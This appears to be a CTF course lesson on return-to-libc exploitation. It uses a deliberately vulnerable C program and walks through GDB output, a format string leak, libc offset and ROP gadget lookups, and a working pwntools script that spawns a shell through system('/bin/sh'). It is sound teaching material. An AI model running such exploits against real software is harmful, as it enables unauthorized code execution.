|
| 1 | +<h1 align="center">PWN 302</h1> |
| 2 | + <p align="center"> |
| 3 | + Return to Libc |
| 4 | + </p> |
| 5 | + |
| 6 | +### Table of contents |
| 7 | + |
| 8 | +- [Introduction](#introduction) |
| 9 | +- [Overwriting the Return Address](#overwriting-the-return-address) |
| 10 | +- [Offset Consistency](#offset-consistency) |
| 11 | +- [Ret2libc Steps](#ret2libc-steps) |
| 12 | +- [Finding Libc Base Address](#finding-libc-base-address) |
| 13 | +- [Finding Other Addresses](#finding-other-addresses) |
| 14 | +- [Putting It All Together](#putting-it-all-together) |
| 15 | +- [Practice](#practice) |
| 16 | +- [More Resources](#more-resources) |
| 17 | +- [Creators](#creators) |
| 18 | + |
| 19 | +## Introduction |
| 20 | + |
| 21 | +Whenever you execute a C program on Linux, the standard C library, libc, is almost always loaded into memory alongside it. A return-to-libc (ret2libc) attack overwrites the saved return address, which `RET` loads into `RIP`, with the address of a function inside libc. Because the attacker reuses code that is already mapped as executable instead of injecting shellcode, the attack bypasses DEP. The attacker must either know in advance the virtual address at which libc was loaded or leak an address inside libc using something like a format string vulnerability. Once the base address of libc is known, the attacker can calculate the address of any libc function they need to jump to. |
| 22 | + |
| 23 | +## Overwriting the Return Address |
| 24 | + |
| 25 | +Here is the code for the program that will be exploited today: |
| 26 | +```c |
| 27 | +#include <stdio.h> |
| 28 | +#include <stdlib.h> |
| 29 | +#include <string.h> |
| 30 | + |
| 31 | +int main(int argc, char **argv) { |
| 32 | + char buf[100]; |
| 33 | + |
| 34 | + while(strncmp("quit", buf, 4) != 0) { |
| 35 | + fgets(buf, 1000, stdin); |
| 36 | + printf(buf); |
| 37 | + } |
| 38 | + |
| 39 | + return 0; |
| 40 | +} |
| 41 | +``` |
| 42 | +
|
| 43 | +Here is a sample of what the program looks like when executed: |
| 44 | +```sh |
| 45 | +$ ./vuln |
| 46 | +The program simply |
| 47 | +The program simply |
| 48 | +Prints out |
| 49 | +Prints out |
| 50 | +Whatever text you give it |
| 51 | +Whatever text you give it |
| 52 | +Until you say |
| 53 | +Until you say |
| 54 | +quit |
| 55 | +quit |
| 56 | +
|
| 57 | +$ |
| 58 | +``` |
| 59 | + |
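| 60 | +If the first four characters of the input are equal to "quit", the loop ends and `main` returns. Because `fgets` is told to accept up to 1000 bytes for a 100-byte buffer, the input can run past the end of `buf`. In this build the saved return address sits 120 bytes from the start of `buf`, so bytes 121 through 128 of the input overwrite it. |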
| 61 | + |
| 62 | +```sh |
| 63 | +$ python3 -c "import sys; sys.stdout.buffer.write(b'quit' + b'A'*116 + b'BBBBBBBB')" |
| 64 | +quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB |
| 65 | +$ gdb vuln |
| 66 | +GNU gdb (Debian 10.1-1.4) 10.1 |
| 67 | +Copyright (C) 2020 Free Software Foundation, Inc. |
| 68 | +License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> |
| 69 | +This is free software: you are free to change and redistribute it. |
| 70 | +There is NO WARRANTY, to the extent permitted by law. |
| 71 | +Type "show copying" and "show warranty" for details. |
| 72 | +This GDB was configured as "x86_64-linux-gnu". |
| 73 | +Type "show configuration" for configuration details. |
| 74 | +For bug reporting instructions, please see: |
| 75 | +<https://www.gnu.org/software/gdb/bugs/>. |
| 76 | +Find the GDB manual and other documentation resources online at: |
| 77 | + <http://www.gnu.org/software/gdb/documentation/>. |
| 78 | + |
| 79 | +For help, type "help". |
| 80 | +Type "apropos word" to search for commands related to "word"... |
| 81 | +GEF for linux ready, type `gef' to start, `gef config' to configure |
| 82 | +78 commands loaded for GDB 10.1 using Python engine 3.9 |
| 83 | +[*] 2 commands could not be loaded, run `gef missing` to know why. |
| 84 | +Reading symbols from vuln... |
| 85 | +(No debugging symbols found in vuln) |
| 86 | +gef➤ r |
| 87 | +Starting program: /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 88 | +quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB |
| 89 | +quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB |
| 90 | +
|
| 91 | +Program received signal SIGSEGV, Segmentation fault. |
| 92 | +0x00005555555551b1 in main () |
| 93 | +[ Legend: Modified register | Code | Heap | Stack | String ] |
| 94 | +────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── |
| 95 | +$rax : 0x0 |
| 96 | +$rbx : 0x0 |
| 97 | +$rcx : 0xfffffff0 |
| 98 | +$rdx : 0x4 |
| 99 | +$rsp : 0x00007fffffffdfc8 → "BBBBBBBB\n" |
| 100 | +$rbp : 0x4141414141414141 ("AAAAAAAA"?) |
| 101 | +$rsi : 0x00007fffffffdf50 → "quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" |
| 102 | +$rdi : 0x0000555555556004 → 0x0000000074697571 ("quit"?) |
| 103 | +$rip : 0x00005555555551b1 → <main+92> ret |
| 104 | +$r8 : 0x00005555555596b0 → "quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" |
| 105 | +$r9 : 0x81 |
| 106 | +$r10 : 0x6e |
| 107 | +$r11 : 0x4 |
| 108 | +$r12 : 0x0000555555555070 → <_start+0> xor ebp, ebp |
| 109 | +$r13 : 0x0 |
| 110 | +$r14 : 0x0 |
| 111 | +$r15 : 0x0 |
| 112 | +$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] |
| 113 | +$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 |
| 114 | +────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── |
| 115 | +0x00007fffffffdfc8│+0x0000: "BBBBBBBB\n" ← $rsp |
| 116 | +0x00007fffffffdfd0│+0x0008: 0x00007fffffff000a → 0x0000000000000000 |
| 117 | +0x00007fffffffdfd8│+0x0010: 0x0000000100000000 |
| 118 | +0x00007fffffffdfe0│+0x0018: 0x0000555555555155 → <main+0> push rbp |
| 119 | +0x00007fffffffdfe8│+0x0020: 0x00007ffff7e157cf → <init_cacheinfo+287> mov rbp, rax |
| 120 | +0x00007fffffffdff0│+0x0028: 0x0000000000000000 |
| 121 | +0x00007fffffffdff8│+0x0030: 0xda40a1a22c058212 |
| 122 | +0x00007fffffffe000│+0x0038: 0x0000555555555070 → <_start+0> xor ebp, ebp |
| 123 | +──────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── |
| 124 | + 0x5555555551a9 <main+84> jne 0x555555555166 <main+17> |
| 125 | + 0x5555555551ab <main+86> mov eax, 0x0 |
| 126 | + 0x5555555551b0 <main+91> leave |
| 127 | + → 0x5555555551b1 <main+92> ret |
| 128 | +[!] Cannot disassemble from $PC |
| 129 | +──────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── |
| 130 | +[#0] Id 1, Name: "vuln", stopped 0x5555555551b1 in main (), reason: SIGSEGV |
| 131 | +────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── |
| 132 | +[#0] 0x5555555551b1 → main() |
| 133 | +───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── |
| 134 | +gef➤ |
| 135 | +``` |
| 136 | +
|
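The 120-byte figure can be checked against the GEF output above. At the crash, `$rsi` appears to still hold the start of `buf` (it was the second argument of the last `strncmp` call), and `$rsp` points at the saved return address that `ret` is about to pop. A minimal sketch of the arithmetic, with both addresses copied from that output and illustrative variable names:

```python
# Addresses copied from the GEF register dump above; they change between runs under ASLR.
buf_start = 0x00007fffffffdf50  # $rsi: start of buf
saved_ret = 0x00007fffffffdfc8  # $rsp at the faulting `ret`

# Distance from the first byte of buf to the saved return address.
offset = saved_ret - buf_start
print(offset)  # 120

# The payload starts with b"quit", so the padding is the remainder.
padding = offset - len(b"quit")
print(padding)  # 116
```

The absolute addresses vary, but their difference depends only on how the compiler laid out `main`'s stack frame, so it should stay the same for a given binary.
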
| 137 | +## Offset Consistency |
| 138 | +
|
| 139 | +One interesting thing to note about ASLR is that while it does modify the locations of certain variables and functions, it usually does not modify the offsets of these variables and functions. For example, suppose that while debugging a running process, we hit a breakpoint and notice that there is some stack variable `x` at location `0x7ffffffff000` and another stack variable `y` at location `0x7ffffffff100`. Assuming ASLR is enabled, if we were to rerun the process a second time and see that `x` is now stored at location `0x7ffffffff510` when we hit the same breakpoint, then we would expect that `y` would be located at `0x7ffffffff610`. In other words, even though the addresses of each variable get modified, `x` and `y` continue to have an offset of exactly `0x100` bytes away from each other in each instance of the program. |
| 140 | +
|
| 141 | +This occurs because ASLR does not randomize the location of each variable individually, which would be far too expensive. Instead, it randomizes only the base addresses of the memory mappings, so the distance between two variables in the same memory mapping rarely changes. |
| 142 | +
|
| 143 | +Of course, there are exceptions to this rule of rarely changing offsets. If `x` was a heap variable while `y` was a stack variable, then there would be a far greater chance for the offsets to change since the heap and the stack are loaded into two very separate memory mappings. Furthermore, if we were to use two different breakpoints at two different locations of the program, then there would be a greater chance for one of the variables to have been deleted or moved somewhere else due to the constantly changing nature of the stack. However, for the purposes of doing a ret2libc attack, this is a perfect scenario because if we know the address where the libc library is loaded, then we can add the value of an unchanging offset to that address to obtain the address of a function within the libc library. |
| 144 | +
|
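The offset argument can be sketched with the example addresses used for `x` and `y` earlier in this section. The values are the illustrative ones from the text, not addresses from a real run:

```python
# Example addresses from the text; real values differ on every run.
run1 = {"x": 0x7ffffffff000, "y": 0x7ffffffff100}
run2_x = 0x7ffffffff510  # where x landed on the second run

# The distance between x and y is fixed within one memory mapping.
offset = run1["y"] - run1["x"]

# Knowing one address on the second run is enough to predict the other.
run2_y = run2_x + offset
print(hex(offset), hex(run2_y))
```

The same arithmetic applies to libc: one leaked address inside the libc mapping plus a known offset gives any other address in that mapping.
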
| 145 | +## Ret2libc Steps |
| 146 | +
|
| 147 | +There are four main steps to completing a basic return-to-libc attack: |
| 148 | +1. Obtain an address that points to something within the libc library using something like a format string vulnerability (only required if ASLR is enabled). |
| 149 | +2. Use the address from step 1 to calculate the base address of the libc library. |
| 150 | +3. Calculate the addresses of the libc functions you would like to jump to using the base address of the libc library. |
| 151 | +4. Use a different vulnerability, such as a buffer overflow, to overwrite the return address with the address of the libc function that you would like to jump to (ROP chains can also be used to jump to multiple libc functions). |
| 152 | +
|
| 153 | +## Finding Libc Base Address |
| 154 | +
|
| 155 | +Our first step is to use a format string vulnerability to leak an address from the stack that points to a function/variable in the libc library. In order to see the entire memory mapping from a specific running instance of the program, we can run the program in GDB using the `r` command, hit Ctrl-C while the program is running, and make use of the `vmmap` command. Note that these addresses can change if you rerun the program. |
| 156 | +
|
| 157 | +```sh |
| 158 | +gef➤ vmmap |
| 159 | +[ Legend: Code | Heap | Stack ] |
| 160 | +Start End Offset Perm Path |
| 161 | +0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 162 | +0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 163 | +0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 164 | +0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 165 | +0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 166 | +0x0000555555559000 0x000055555557a000 0x0000000000000000 rw- [heap] |
| 167 | +0x00007ffff7def000 0x00007ffff7e14000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 168 | +0x00007ffff7e14000 0x00007ffff7f5f000 0x0000000000025000 r-x /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 169 | +0x00007ffff7f5f000 0x00007ffff7fa9000 0x0000000000170000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 170 | +0x00007ffff7fa9000 0x00007ffff7faa000 0x00000000001ba000 --- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 171 | +0x00007ffff7faa000 0x00007ffff7fad000 0x00000000001ba000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 172 | +0x00007ffff7fad000 0x00007ffff7fb0000 0x00000000001bd000 rw- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 173 | +0x00007ffff7fb0000 0x00007ffff7fb6000 0x0000000000000000 rw- |
| 174 | +0x00007ffff7fcc000 0x00007ffff7fd0000 0x0000000000000000 r-- [vvar] |
| 175 | +0x00007ffff7fd0000 0x00007ffff7fd2000 0x0000000000000000 r-x [vdso] |
| 176 | +0x00007ffff7fd2000 0x00007ffff7fd3000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 177 | +0x00007ffff7fd3000 0x00007ffff7ff3000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 178 | +0x00007ffff7ff3000 0x00007ffff7ffb000 0x0000000000021000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 179 | +0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000029000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 180 | +0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002a000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 181 | +0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw- |
| 182 | +0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack] |
| 183 | +``` |
| 184 | +
|
| 185 | +In this instance of the program, the base of libc is at `0x7ffff7def000`, and the end of libc is at `0x00007ffff7fb0000`. If we exploit the format string vulnerability, we can see that the fifth pointer printed out from the stack points to an address that is within the libc library, so it will be the address that we use. |
| 186 | +
|
| 187 | +```sh |
| 188 | +gef➤ c |
| 189 | +Continuing. |
| 190 | +%p.%p.%p.%p.%p.%p. |
| 191 | +0x5555555592a1.(nil).0x5555555592b3.0x7fffffffdf50.0x7ffff7fadbe0.0x7fffffffe0b8. |
| 192 | +``` |
| 193 | +
|
| 194 | +If we subtract the base of libc from the fifth pointer, we get `0x7ffff7fadbe0 - 0x7ffff7def000 = 0x1bebe0`. In other words, if we subtract an offset of `0x1bebe0` from the value of the fifth pointer, then we can obtain the address of the base of libc. We can use this information to start creating an exploit script with pwntools. |
| 195 | +
|
| 196 | +```python |
| 197 | +#!/usr/bin/env python3 |
| 198 | +from pwn import * |
| 199 | +
|
| 200 | +# Open up the process |
| 201 | +p = process("./vuln", stdin=PTY) |
| 202 | +
|
| 203 | +# Leak a libc address |
| 204 | +p.sendline(b"%5$p") |
| 205 | +libc_base = int(p.recvline(), 16) - 0x1bebe0 |
| 206 | +``` |
| 207 | +
|
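Since memory mappings start on page boundaries, a computed libc base should end in three zero hex digits. The sketch below wraps the subtraction in a hypothetical helper, `libc_base_from_leak`, that rejects a misaligned result. The helper name and the check are additions for illustration, and the offset `0x1bebe0` only applies to the libc build shown in this write-up.

```python
PAGE_SIZE = 0x1000
LEAK_OFFSET = 0x1bebe0  # leaked pointer minus libc base, measured above for this libc build


def libc_base_from_leak(leak: int, leak_offset: int = LEAK_OFFSET) -> int:
    """Subtract the known offset from a leaked pointer and sanity-check the result."""
    base = leak - leak_offset
    if base % PAGE_SIZE != 0:
        # A misaligned base usually means the offset belongs to a different libc build.
        raise ValueError(f"computed base {base:#x} is not page-aligned")
    return base


# Value of the fifth pointer from the GDB session above.
base = libc_base_from_leak(0x7ffff7fadbe0)
print(hex(base))  # 0x7ffff7def000
```

In the exploit script, the leaked integer parsed from `p.recvline()` could be passed through such a check before any other address is derived from it.
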
| 208 | +## Finding Other Addresses |
| 209 | +
|
| 210 | +Our next step is to obtain the address of `system()`, which is located in libc. On this system, libc is the file `/usr/lib/x86_64-linux-gnu/libc-2.31.so`, as the `vmmap` output shows. The path and version differ between distributions, and offsets taken from one libc build do not apply to another. We can use the following command to obtain the offset of `system()` from the base of libc. |
| 211 | +
|
| 212 | +```sh |
| 213 | +$ readelf -s /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep system |
| 214 | + 1430: 0000000000048df0 45 FUNC WEAK DEFAULT 14 system@@GLIBC_2.2.5 |
| 215 | +``` |
| 216 | +
|
| 217 | +The offset is `0x48df0`, meaning that if we add `0x48df0` to the `libc_base` variable we created in the Python script earlier, we should get the address of `system()`. |
| 218 | +
|
| 219 | +Since our goal is to call `system("/bin/sh")`, we'll also need to have a pointer to the string `/bin/sh`. Because libc uses this string in its code, this string is also located within the libc library, and we can use GDB to look for it. |
| 220 | +
|
| 221 | +```sh |
| 222 | +gef➤ find 0x00007ffff7def000,0x00007ffff7fb0000,"/bin/sh" |
| 223 | +0x7ffff7f79156 |
| 224 | +1 pattern found. |
| 225 | +gef➤ x/s 0x7ffff7f79156 |
| 226 | +0x7ffff7f79156: "/bin/sh" |
| 227 | +``` |
| 228 | +
|
| 229 | +Note that the parameters for the above `find` command are the beginning and end of the libc memory mapping for that instance. The command gave us an address of `0x7ffff7f79156`, which has an offset of `0x7ffff7f79156 - 0x7ffff7def000 = 0x18a156`. |
| 230 | +
|
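The same offset can be cross-checked without a debugger by searching the libc file itself. The sketch below is plain Python, and `find_offsets` is a hypothetical helper rather than part of any tool used here. It returns file offsets, which match load offsets only where the `Offset` column of `vmmap` equals the mapping's distance from the libc base. That holds for the read-only mapping that contains `0x18a156` in the output shown earlier, but it is an assumption to verify for other builds.

```python
from pathlib import Path


def find_offsets(path: str, needle: bytes) -> list:
    """Return every file offset at which `needle` occurs in the file at `path`."""
    data = Path(path).read_bytes()
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


if __name__ == "__main__":
    # Path taken from the vmmap output; it differs between systems.
    libc_path = "/usr/lib/x86_64-linux-gnu/libc-2.31.so"
    if Path(libc_path).exists():
        for off in find_offsets(libc_path, b"/bin/sh\x00"):
            print(hex(off))
```

Including the trailing NUL byte in the search pattern avoids matching longer strings that merely begin with `/bin/sh`.
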
| 231 | +We'll also need to have access to a `POP RDI` ROP gadget, which will allow us to store a pointer to the `/bin/sh` string into `RDI`. We can use the command shown below to obtain a `POP RDI` gadget (entire output not shown to save space). |
| 232 | +
|
| 233 | +```sh |
| 234 | +$ ropper --file /usr/lib/x86_64-linux-gnu/libc-2.31.so --search "pop rdi" |
| 235 | +[INFO] Load gadgets from cache |
| 236 | +[LOAD] loading... 100% |
| 237 | +[LOAD] removing double gadgets... 100% |
| 238 | +[INFO] Searching for gadgets: pop rdi |
| 239 | +
|
| 240 | +[INFO] File: /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 241 | +
|
| 242 | +[...] |
| 243 | +
|
| 244 | +0x0000000000026796: pop rdi; ret; |
| 245 | +0x000000000008f2d4: pop rdi; stc; jmp qword ptr [rsi + 0xf]; |
| 246 | +``` |
| 247 | +
|
| 248 | +The gadget at offset `0x26796` seems suitable for our purposes. |
| 249 | +
|
| 250 | +The last offset we need is that of the `exit()` function, which will allow us to cleanly exit the program once we're done using our shell. We can find this offset the same way we found the offset of `system()`. |
| 251 | +
|
| 252 | +```sh |
| 253 | +$ readelf -s /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep exit |
| 254 | + 135: 000000000003e600 26 FUNC GLOBAL DEFAULT 14 exit@@GLIBC_2.2.5 |
| 255 | + 552: 00000000000cb610 72 FUNC GLOBAL DEFAULT 14 _exit@@GLIBC_2.2.5 |
| 256 | + 609: 0000000000130bb0 37 FUNC GLOBAL DEFAULT 14 svc_exit@@GLIBC_2.2.5 |
| 257 | + 643: 0000000000138360 23 FUNC GLOBAL DEFAULT 14 quick_exit@GLIBC_2.10 |
| 258 | + 2217: 000000000003e620 276 FUNC WEAK DEFAULT 14 on_exit@@GLIBC_2.2.5 |
| 259 | +``` |
| 260 | +
|
| 261 | +We'll be using the first offset, `0x3e600`, and we'll ignore the other functions. |
| 262 | +
|
| 263 | +## Putting It All Together |
| 264 | +
|
| 265 | +Using the information we gathered in the previous section, we can generate the following exploit script: |
| 266 | +```python |
| 267 | +#!/usr/bin/env python3 |
| 268 | +from pwn import * |
| 269 | +
|
| 270 | +# Open up the process |
| 271 | +p = process("./vuln", stdin=PTY) |
| 272 | +
|
| 273 | +# Leak a libc address |
| 274 | +p.sendline(b"%5$p") |
| 275 | +libc_base = int(p.recvline(), 16) - 0x1bebe0 |
| 276 | +
|
| 277 | +# Calculate other addresses |
| 278 | +system = p64(libc_base + 0x48df0) |
| 279 | +bin_sh = p64(libc_base + 0x18a156) |
| 280 | +pop_rdi = p64(libc_base + 0x26796) |
| 281 | +exit = p64(libc_base + 0x3e600) |
| 282 | +
|
| 283 | +# Create the payload |
| 284 | +payload = b'quit' |
| 285 | +payload += b'A'*116 |
| 286 | +payload += pop_rdi |
| 287 | +payload += bin_sh |
| 288 | +payload += system |
| 289 | +payload += exit |
| 290 | +
|
| 291 | +# Trigger the buffer overflow |
| 292 | +p.sendline(payload) |
| 293 | +p.interactive() |
| 294 | +``` |
| 295 | +
|
| 296 | +First, we use the format string vulnerability to leak an address that allows us to calculate the base of libc. Next, we add various offsets to this base value in order to obtain the addresses that we need to use in our exploit. Once that is done, we build a payload that does the following: |
| 297 | +1. Starts with the string `quit` so that the program breaks out of the loop and `main` reaches its `RET` instruction. |
| 298 | +2. Pads the input with 116 `A` bytes to reach the saved return address. |
| 299 | +3. Overwrites the saved return address with the address of the `POP RDI; RET` gadget. |
| 300 | +4. Places the address of `/bin/sh` next on the stack, so the gadget pops it into `RDI`. |
| 301 | +5. Places the address of `system()` after that, so the gadget's `RET` jumps to `system()` with `RDI` pointing to `/bin/sh`. |
| 302 | +6. Places the address of `exit()` last, so that `system()` returns into `exit()` once the shell is closed. |
| 303 | +
|
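To make the stack layout concrete, the sketch below rebuilds the payload with only the standard library and prints where each 8-byte slot lands. The local `p64` is a stand-in for the pwntools function of the same name, and `libc_base` is hard-coded to the value from the `vmmap` output above purely for illustration. A real exploit has to use the base computed from the leak.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


libc_base = 0x7ffff7def000  # from the vmmap output above; differs on every run under ASLR

# Slots in the order they sit on the stack, starting at the saved return address.
chain = [
    ("pop rdi; ret", libc_base + 0x26796),
    ("pointer to /bin/sh", libc_base + 0x18a156),
    ("system", libc_base + 0x48df0),
    ("exit", libc_base + 0x3e600),
]

payload = b"quit" + b"A" * 116 + b"".join(p64(addr) for _, addr in chain)

# Show the byte offset of each slot relative to the start of buf.
for i, (name, addr) in enumerate(chain):
    print(f"offset {120 + 8 * i}: {addr:#x}  {name}")
```

Each `RET` pops the next slot into `RIP`, which is why the order of the entries matters more than their individual values.
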
| 304 | +When we run this script, we get a working shell. |
| 305 | +
|
| 306 | +```sh |
| 307 | +$ ./exploit.py |
| 308 | +[+] Starting local process './vuln': pid 2734 |
| 309 | +[*] Switching to interactive mode |
| 310 | +$ ls |
| 311 | +exploit.py README.md vuln vuln.c |
| 312 | +$ whoami |
| 313 | +nihaal |
| 314 | +$ |
| 315 | +``` |
| 316 | +
|
| 317 | +## Practice |
| 318 | +
|
| 319 | +The best way to practice creating ROP chains is to go through the challenges in [ROP Emporium](https://ropemporium.com/). These challenges will help you get better at return-oriented programming, and they'll help you understand how to get through common obstacles when dealing with ROP chains. |
| 320 | +
|
| 321 | +## More Resources |
| 322 | +- [NX bit](https://en.wikipedia.org/wiki/NX_bit) |
| 323 | +- [Symbol Table & Global Offset Table](https://www.codeproject.com/articles/1032231/what-is-the-symbol-table-and-what-is-the-global-of) |
| 324 | +- [ROP Emporium](https://ropemporium.com/) |
| 325 | +- [Nightmare's ROP Writeups](https://guyinatuxedo.github.io/rop.html) |
| 326 | +
|
| 327 | +## Creators |
| 328 | +
|
| 329 | +**Nihaal Prasad** |
| 330 | +
|
| 331 | +Enjoy :metal: |